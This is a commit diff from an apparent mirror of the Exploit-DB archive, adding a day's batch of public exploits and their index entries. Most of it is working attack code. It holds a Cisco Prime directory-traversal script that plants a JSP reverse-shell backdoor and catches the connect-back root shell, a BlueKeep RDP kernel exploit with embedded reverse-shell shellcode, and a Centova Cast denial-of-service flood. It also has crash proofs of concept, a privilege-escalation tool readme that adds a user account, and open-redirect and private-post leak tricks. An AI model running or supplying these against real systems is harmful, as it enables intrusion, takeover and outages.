bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-11-20

Browse source 
13 changes to exploits/shellcodes

ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
Centova Cast 3.2.12 - Denial of Service (PoC)
scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path
Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation
DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'
Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free
Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution
Apache Httpd mod_proxy - Error Page Cross-Site Scripting
Apache Httpd mod_rewrite - Open Redirects
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
This commit is contained in:
Offensive Security 2019-11-20 05:01:41 +00:00
parent 3e9ff5a927
commit 72cddaee51
14 changed files with 611 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
exploits/hardware/dos/47677.sh Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
# Date: 2019-11-18
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.12
# Tested on: Debian 9, CentOS 7
# ===============================================
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
#!/bin/bash
if [ "$3" = "" ]
then
echo "Usage: $0 centovacast_url reseller/admin password"
exit
fi
url=$1
reseller=$2
pass=$3
dwn() {
echo -n .
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
}
for i in {0..32}
do
dwn /dev/zero
sleep .1
done
echo "
Done!"

24
exploits/ios/dos/47678.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-18
# Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634
# Software Link: App Store for iOS devices
# Tested Version: 1.1.4.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2
# Steps to Produce the Crash:
# 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py
# 2.- Copy content to clipboard
# 3.- Open "scadaApp for iOS"
# 4.- Let's go
# 5.- Username > "l4m5"
# 6.- Password > "l4m5"
# 7.- Paste ClipBoard on "Servername"
# 8.- Login
# 9.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 257
print (buffer)

172
exploits/linux/remote/47686.py Executable file
View file

@ -0,0 +1,172 @@
#!/usr/bin/python
"""
Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability
Steven Seeley (mr_me) of Source Incite - 2019
SRC: SRC-2019-0034
CVE: CVE-2019-1821
Example:
========
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444
saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
(+) planted backdoor!
(+) starting handler on port 4444
(+) connection from 192.168.100.123
(+) pop thy shell!
python -c 'import pty; pty.spawn("/bin/bash")'
[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
sh-4.1# /usr/bin/id
/usr/bin/id
uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
sh-4.1# exit
exit
exit
[prime@piconsole CSCOlumos]$ exit
exit
exit
"""
import sys
import socket
import requests
import tarfile
import telnetlib
from threading import Thread
from cStringIO import StringIO
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def _build_tar(ls, lp):
"""
build the tar archive without touching disk
"""
f = StringIO()
b = _get_jsp(ls, lp)
t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")
t.size = len(b)
with tarfile.open(fileobj=f, mode="w") as tar:
tar.addfile(t, StringIO(b))
return f.getvalue()
def _get_jsp(ls, lp):
jsp = """<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream sv;
OutputStream tp;
StreamConnector( InputStream sv, OutputStream tp )
{
this.sv = sv;
this.tp = tp;
}
public void run()
{
BufferedReader za = null;
BufferedWriter hjr = null;
try
{
za = new BufferedReader( new InputStreamReader( this.sv ) );
hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );
char buffer[] = new char[8192];
int length;
while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )
{
hjr.write( buffer, 0, length );
hjr.flush();
}
} catch( Exception e ){}
try
{
if( za != null )
za.close();
if( hjr != null )
hjr.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath = new String("/bin/sh");
Socket socket = new Socket("__IP__", __PORT__);
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>"""
return jsp.replace("__IP__", ls).replace("__PORT__", str(lp))
def handler(lp):
"""
This is the client handler, to catch the connectback
"""
print "(+) starting handler on port %d" % lp
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lp))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def exec_code(t, lp):
"""
This function threads the client handler and sends off the attacking payload
"""
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
r = requests.get("https://%s/si.jsp" % t, verify=False)
def we_can_upload(t, ls, lp):
"""
This is where we take advantage of the vulnerability
"""
td = _build_tar(ls, lp)
bd = {'files': ('si.tar', td)}
h = {
'Destination-Dir': 'tftpRoot',
'Compressed-Archive': "false",
'Primary-IP' : '127.0.0.1',
'Filecount' : "1",
'Filename': "si.tar",
'Filesize' : str(len(td)),
}
r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False)
if r.status_code == 200:
return True
return False
def main():
if len(sys.argv) != 3:
print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
cb = sys.argv[2]
if not ":" in cb:
print "(+) using default connectback port 4444"
ls = cb
lp = 4444
else:
if not cb.split(":")[1].isdigit():
print "(-) %s is not a port number!" % cb.split(":")[1]
sys.exit(-1)
ls = cb.split(":")[0]
lp = int(cb.split(":")[1])
if we_can_upload(t, ls, lp):
print "(+) planted backdoor!"
exec_code(t, lp)
if __name__ == '__main__':
main()

14
exploits/multiple/webapps/47688.md Normal file
View file

@ -0,0 +1,14 @@
The trick is to use a vertical tab (`%09`) and then place another URL in the tag. So once a victim clicks the link on the error page, she will go somewhere else.
As you can see, the browser changes the destination from relative / to an absolute url https://enoflag.de. The exploit is `http://domain.tld/%09//otherdomain.tld`
Here's the httpd configuration to reproduce the behavior:
```
<Location />
ProxyPass http://127.0.0.1:9000/ connectiontimeout=1 timeout=2
ProxyPassReverse http://127.0.0.1:9000/
Order allow,deny
Allow from all
</Location>
```

9
exploits/multiple/webapps/47689.md Normal file
View file

@ -0,0 +1,9 @@
Normal URLs like http://redirect.local/test will be forwared to https://redirect.local/test. But by using newlines (CVE 2019-10098), we can redirect somewhere else (i.e. to `https://redirect.local.evilwebsite.com`):
```
curl -Ik 'https://redirect.local/%0a.evilwebsite.com' --path-as-is
HTTP/2 302
date: Mon, 28 Oct 2019 03:36:58 GMT
content-type: text/html; charset=iso-8859-1
location: https://redirect.local.evilwebsite.com
```

10
exploits/multiple/webapps/47690.md Normal file
View file

@ -0,0 +1,10 @@
So far we know that adding `?static=1` to a wordpress URL should leak its secret content
Here are a few ways to manipulate the returned entries:
- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:

24
exploits/windows/dos/47674.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
# Discovery by: Diego Buztamante
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Click on "Enter Key"
# 5.- Paste ClipBoard on "Name: "
# 6.- OK
# 7.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("ipPulse_1.92.txt", "w")
f.write(buffer)
f.close()

30
exploits/windows/dos/47679.py Executable file
View file

@ -0,0 +1,30 @@
#Exploit Title: XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.xmedia-recode.de/
#Link Software : https://www.xmedia-recode.de/download.php
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
'''
Proof of Concept (PoC):
=======================
1.Download and install XMedia Recode
2.Run the python operating script that will create a file (poc.m3u)
3.Run the software "File -> Open File -> Add the file (.m3u) "
4.XMedia Recode Crashed
'''
#!/usr/bin/python
http = "http://"
buffer = "\x41" * 500
poc = http + buffer
file = open("poc.m3u,"w")
file.write(poc)
file.close()
print "POC Created by ZwX"

25
exploits/windows/local/47675.txt Normal file
View file

@ -0,0 +1,25 @@
#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.filehorse.com/
#Link Software : https://www.filehorse.com/download-bartvpn/
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc BartVPNService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: BartVPNService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BartVPNService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

37
exploits/windows/local/47676.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.rockwellautomation.com/en_NA/overview.page
# Software Link : https://www.rockwellautomation.com/en_NA/products/factorytalk/overview.page?pagetitle=Studio-5000-Logix-Designer&docid=924d2f2060bf9d409286937296a18142
# Rockwell Automation Technologies
# Tested Version: 30.01.00
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Rockwell" |findstr /i /v """
FactoryTalk Activation Service FactoryTalk Activation Service C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe Auto
# Service info:
C:\>sc qc "FactoryTalk Activation Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FactoryTalk Activation Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FactoryTalk Activation Service
DEPENDENCIES : winmgmt
: wmiapsrv
: +NetworkProvider
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

43
exploits/windows/local/47684.md Normal file
View file

@ -0,0 +1,43 @@
## EDB Note
Download:
- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe
- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip
# COMahawk
**Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322**
## Video Demo
https://vimeo.com/373051209
## Usage
### Compile or Download from Release (https://github.com/apt69/COMahawk/releases)
1. Run COMahawk.exe
2. ???
3. Hopefully profit
or
1. COMahawk.exe "custom command to run" (ie. COMahawk.exe "net user /add test123 lol123 &")
2. ???
3. Hopefully profit
## Concerns
**MSDN mentioned that only 1803 to 1903 is vulnerable to CVE-2019-1322. If it doesn't work, maybe it was patched.**
However, it is confirmed that my 1903 does indeed have this bug so maybe it was introduced somewhere inbetween. YMMV.
Also, since you are executing from a service - you most likely cannot spawn any Window hence all command will be "GUI-less". Maybe different session? Idk, it is too late and I am tired haha.
## Credits:
https://twitter.com/leoloobeek for helping me even when he doesn't even have a laptop
https://twitter.com/TomahawkApt69 for being the mental support and motivation
and most of all:
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
for discovering and publishing the write up. 100% of the credit goes here.

1
exploits/windows_x86-64/local/47685.txt Normal file
View file

@ -0,0 +1 @@
EDB Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47685.zip

177
exploits/windows_x86/remote/47683.py Executable file
View file

@ -0,0 +1,177 @@
# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip
import rdp
import socket
import binascii
import time
def pool_spray(s, crypter, payload):
times = 10000
count = 0
while count < times:
count += 1
#print('time through %d' % count)
try:
s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, payload))
except ConnectionResetError:
print('ConnectionResetError pool_spray Aborting')
quit()
def main():
# change to your target
host = '192.168.0.46'
port = 3389
times = 4000
count = 0
target = (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
crypter = rdp.connect(s)
# this address was choosen for the pool spray. it could be be
# modified for potentially higher success rates.
# in my testing against the win7 VM it is around 80% success
# 0x874ff028
shellcode_address = b'\x28\xf0\x4f\x87'
# replace buf with your shellcode
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x00\x22\x68"
buf += b"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
buf += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
buf += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
buf += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
buf += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
buf += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
buf += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
buf += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
# bluekeep_kshellcode_x86.asm
# ring 0 to ring 3 shellcode
shellcode = b""
shellcode += b"\x60\xe8\x00\x00\x00\x00\x5b\xe8\x26\x00\x00\x00"
shellcode += b"\xb9\x76\x01\x00\x00\x0f\x32\x8d\x7b\x3c\x39\xf8"
shellcode += b"\x74\x11\x39\x45\x00\x74\x06\x89\x45\x00\x89\x55"
shellcode += b"\x08\x89\xf8\x31\xd2\x0f\x30\x61\xf4\xeb\xfd\xc2"
shellcode += b"\x24\x00\x8d\xab\x00\x10\x00\x00\xc1\xed\x0c\xc1"
shellcode += b"\xe5\x0c\x83\xed\x50\xc3\xb9\x23\x00\x00\x00\x6a"
shellcode += b"\x30\x0f\xa1\x8e\xd9\x8e\xc1\x64\x8b\x0d\x40\x00"
shellcode += b"\x00\x00\x8b\x61\x04\x51\x9c\x60\xe8\x00\x00\x00"
shellcode += b"\x00\x5b\xe8\xcb\xff\xff\xff\x8b\x45\x00\x83\xc0"
shellcode += b"\x17\x89\x44\x24\x24\x31\xc0\x99\x42\xf0\x0f\xb0"
shellcode += b"\x55\x08\x75\x12\xb9\x76\x01\x00\x00\x99\x8b\x45"
shellcode += b"\x00\x0f\x30\xfb\xe8\x04\x00\x00\x00\xfa\x61\x9d"
shellcode += b"\xc3\x8b\x45\x00\xc1\xe8\x0c\xc1\xe0\x0c\x2d\x00"
shellcode += b"\x10\x00\x00\x66\x81\x38\x4d\x5a\x75\xf4\x89\x45"
shellcode += b"\x04\xb8\x78\x7c\xf4\xdb\xe8\xd3\x00\x00\x00\x97"
shellcode += b"\xb8\x3f\x5f\x64\x77\x57\xe8\xc7\x00\x00\x00\x29"
shellcode += b"\xf8\x89\xc1\x3d\x70\x01\x00\x00\x75\x03\x83\xc0"
shellcode += b"\x08\x8d\x58\x1c\x8d\x34\x1f\x64\xa1\x24\x01\x00"
shellcode += b"\x00\x8b\x36\x89\xf2\x29\xc2\x81\xfa\x00\x04\x00"
shellcode += b"\x00\x77\xf2\x52\xb8\xe1\x14\x01\x17\xe8\x9b\x00"
shellcode += b"\x00\x00\x8b\x40\x0a\x8d\x50\x04\x8d\x34\x0f\xe8"
shellcode += b"\xcb\x00\x00\x00\x3d\x5a\x6a\xfa\xc1\x74\x0e\x3d"
shellcode += b"\xd8\x83\xe0\x3e\x74\x07\x8b\x3c\x17\x29\xd7\xeb"
shellcode += b"\xe3\x89\x7d\x0c\x8d\x1c\x1f\x8d\x75\x10\x5f\x8b"
shellcode += b"\x5b\x04\xb8\x3e\x4c\xf8\xce\xe8\x61\x00\x00\x00"
shellcode += b"\x8b\x40\x0a\x3c\xa0\x77\x02\x2c\x08\x29\xf8\x83"
shellcode += b"\x7c\x03\xfc\x00\x74\xe1\x31\xc0\x55\x6a\x01\x55"
shellcode += b"\x50\xe8\x00\x00\x00\x00\x81\x04\x24\x92\x00\x00"
shellcode += b"\x00\x50\x53\x29\x3c\x24\x56\xb8\xc4\x5c\x19\x6d"
shellcode += b"\xe8\x25\x00\x00\x00\x31\xc0\x50\x50\x50\x56\xb8"
shellcode += b"\x34\x46\xcc\xaf\xe8\x15\x00\x00\x00\x85\xc0\x74"
shellcode += b"\xaa\x8b\x45\x1c\x80\x78\x0e\x01\x74\x07\x89\x00"
shellcode += b"\x89\x40\x04\xeb\x9a\xc3\xe8\x02\x00\x00\x00\xff"
shellcode += b"\xe0\x60\x8b\x6d\x04\x97\x8b\x45\x3c\x8b\x54\x05"
shellcode += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\x49"
shellcode += b"\x8b\x34\x8b\x01\xee\xe8\x1d\x00\x00\x00\x39\xf8"
shellcode += b"\x75\xf1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
shellcode += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24"
shellcode += b"\x1c\x61\xc3\x52\x31\xc0\x99\xac\xc1\xca\x0d\x01"
shellcode += b"\xc2\x85\xc0\x75\xf6\x92\x5a\xc3\x58\x89\x44\x24"
shellcode += b"\x10\x58\x59\x58\x5a\x60\x52\x51\x8b\x28\x31\xc0"
shellcode += b"\x64\xa2\x24\x00\x00\x00\x99\xb0\x40\x50\xc1\xe0"
shellcode += b"\x06\x50\x54\x52\x89\x11\x51\x4a\x52\xb8\xea\x99"
shellcode += b"\x6e\x57\xe8\x7b\xff\xff\xff\x85\xc0\x75\x4f\x58"
shellcode += b"\x8b\x38\xe8\x00\x00\x00\x00\x5e\x83\xc6\x55\xb9"
shellcode += b"\x00\x04\x00\x00\xf3\xa4\x8b\x45\x0c\x50\xb8\x48"
shellcode += b"\xb8\x18\xb8\xe8\x56\xff\xff\xff\x8b\x40\x0c\x8b"
shellcode += b"\x40\x14\x8b\x00\x66\x83\x78\x24\x18\x75\xf7\x8b"
shellcode += b"\x50\x28\x81\x7a\x0c\x33\x00\x32\x00\x75\xeb\x8b"
shellcode += b"\x58\x10\x89\x5d\x04\xb8\x5e\x51\x5e\x83\xe8\x32"
shellcode += b"\xff\xff\xff\x59\x89\x01\x31\xc0\x88\x45\x08\x40"
shellcode += b"\x64\xa2\x24\x00\x00\x00\x61\xc3\x5a\x58\x58\x59"
shellcode += b"\x51\x51\x51\xe8\x00\x00\x00\x00\x83\x04\x24\x09"
shellcode += b"\x51\x51\x52\xff\xe0\x31\xc0"
shellcode += buf
print('shellcode len: %d' % len(shellcode))
payload_size = 1600
payload = b'\x2c\xf0\x4f\x87' + shellcode
payload = payload + b'\x5a' * (payload_size - len(payload))
print('[+] spraying pool')
pool_spray(s, crypter, payload)
fake_obj_size = 168
call_offset = 108
fake_obj = b'\x00'*call_offset + shellcode_address
fake_obj = fake_obj + b'\x00' * (fake_obj_size - len(fake_obj))
time.sleep(.5)
print('[+] sending free')
s.sendall(rdp.free_32(crypter))
time.sleep(.15)
print('[+] allocating fake objects')
while count < times:
count += 1
#print('time through %d' % count)
try:
s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, fake_obj))
except ConnectionResetError:
s.close()
s.close()
if __name__== "__main__":
main()

13
files_exploits.csv
View file

@ -6597,6 +6597,10 @@ id,file,description,date,author,type,platform,port
47662,exploits/windows/dos/47662.txt,"iSmartViewPro 1.3.34 - Denial of Service (PoC)",2019-11-18,"Ivan Marmolejo",dos,windows,
47665,exploits/ios/dos/47665.py,"Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)",2019-11-18,"Luis Martínez",dos,ios,
47671,exploits/windows/dos/47671.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-11-18,chuyreds,dos,windows,
47674,exploits/windows/dos/47674.py,"ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)",2019-11-19,"Diego Armando Buztamante Rico",dos,windows,
47677,exploits/hardware/dos/47677.sh,"Centova Cast 3.2.12 - Denial of Service (PoC)",2019-11-19,DroidU,dos,hardware,
47678,exploits/ios/dos/47678.py,"scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)",2019-11-19,"Luis Martínez",dos,ios,
47679,exploits/windows/dos/47679.py,"XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service",2019-11-19,ZwX,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10781,6 +10785,10 @@ id,file,description,date,author,type,platform,port
47664,exploits/windows/local/47664.txt,"ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path",2019-11-18,"Olimpia Saucedo",local,windows,
47667,exploits/windows/local/47667.txt,"MobileGo 8.5.0 - Insecure File Permissions",2019-11-18,ZwX,local,windows,
47668,exploits/windows/local/47668.txt,"NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths",2019-11-18,"Akif Mohamed Ik",local,windows,
47675,exploits/windows/local/47675.txt,"BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path",2019-11-19,ZwX,local,windows,
47676,exploits/windows/local/47676.txt,"Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path",2019-11-19,"Luis Martínez",local,windows,
47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,
47685,exploits/windows_x86-64/local/47685.txt,"DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'",2019-11-03,Mumbai,local,windows_x86-64,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17794,6 +17802,8 @@ id,file,description,date,author,type,platform,port
47626,exploits/hardware/remote/47626.rb,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)",2019-11-12,LiquidWorm,remote,hardware,
47629,exploits/hardware/remote/47629.txt,"CBAS-Web 19.0.0 - Information Disclosure",2019-11-12,LiquidWorm,remote,hardware,
47673,exploits/linux/remote/47673.py,"nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)",2019-11-18,"Guy Levin",remote,linux,
47683,exploits/windows_x86/remote/47683.py,"Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free",2019-11-19,0xeb-bp,remote,windows_x86,
47686,exploits/linux/remote/47686.py,"Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution",2019-05-17,mr_me,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41988,3 +41998,6 @@ id,file,description,date,author,type,platform,port
47669,exploits/hardware/webapps/47669.sh,"Centova Cast 3.2.11 - Arbitrary File Download",2019-11-18,DroidU,webapps,hardware,
47670,exploits/php/webapps/47670.txt,"TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)",2019-11-18,"Pablo Santiago",webapps,php,
47672,exploits/php/webapps/47672.txt,"TemaTres 3.0 - 'value' Persistent Cross-site Scripting",2019-11-18,"Pablo Santiago",webapps,php,
47688,exploits/multiple/webapps/47688.md,"Apache Httpd mod_proxy - Error Page Cross-Site Scripting",2019-10-14,"Sebastian Neef",webapps,multiple,
47689,exploits/multiple/webapps/47689.md,"Apache Httpd mod_rewrite - Open Redirects",2019-10-14,"Sebastian Neef",webapps,multiple,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,

Can't render this file because it is too large.